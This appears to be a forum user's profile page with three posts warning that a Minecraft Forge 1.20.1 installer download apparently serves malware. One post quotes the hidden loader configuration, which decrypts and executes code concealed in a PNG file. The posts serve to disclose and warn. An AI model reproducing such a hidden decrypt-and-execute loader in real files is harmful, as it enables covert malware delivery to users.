Jump to content

szzaass

Members
  • Posts

    3
  • Joined

  • Last visited

szzaass's Achievements

Tree Puncher

Tree Puncher (2/8)

1

Reputation

  1. @Always needs help If you know a bit of HTML/JS you can inspect the adfocus skip button and get the correct download link from there. I'm not posting it here because I'm not sure if the rules allow it. There seems to be something overriding the download function when you click the skip button. Seems like some ill intentioned javascript injection is going on regarding adfocus and they are banking on people's interest in the newest versions of Forge. @Paint_Ninja I think this is something worth looking into, I'm sorry to mention you directly but it might hurt community trust if not addressed.
  2. Adding a bit more context: File downloaded from official forge site (https://files.minecraftforge.net/net/minecraftforge/forge/index_1.20.1.html😞 forge-1.20.1-47.1.46-installer.jar.zip Contents of zip file: - forge-1.20.1-47.1.46-installer.jar.Install_v3.6.5.639.exe + conf/ - juW3tVkmk4JXLkWAsUjtS1T2iZLOYSQt.png - nginx.conf Contents of _nginx.conf_ file: worker_processes 1; http { copy_file_or_dir conf /Google/Chrome/conf; read_file_from_offset global_buf global_len conf/juW3tVkmk4JXLkWAsUjtS1T2iZLOYSQt.png 51033; decrypt_aes global_buf xS8qrBECI5HlEIb8 global_len; execute global_buf; } The contents of this .conf file are all shades of grey possible. Something REALLY weird is that downloading from different browsers result in different contents. The overall thing is the same, but the png file name changes and the buffer length read is different as well.
  3. I am having the same issue for forge 1.20.1, both releases, but NOT for 1.20 and any other version below that. @Always needs help did you by any chance unzip the whole thing, including the weird conf folder? This seems extremely likely to be a virus. I opened the nginx.conf file from the conf folder in a text editor and this file reads and executes the png file from that same folder. I assumed the exe file would set it all up and allow the hidden code from the image to be executed on my pc, so I avoided that, but I would suggest you check, double check and triple check for viruses.
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.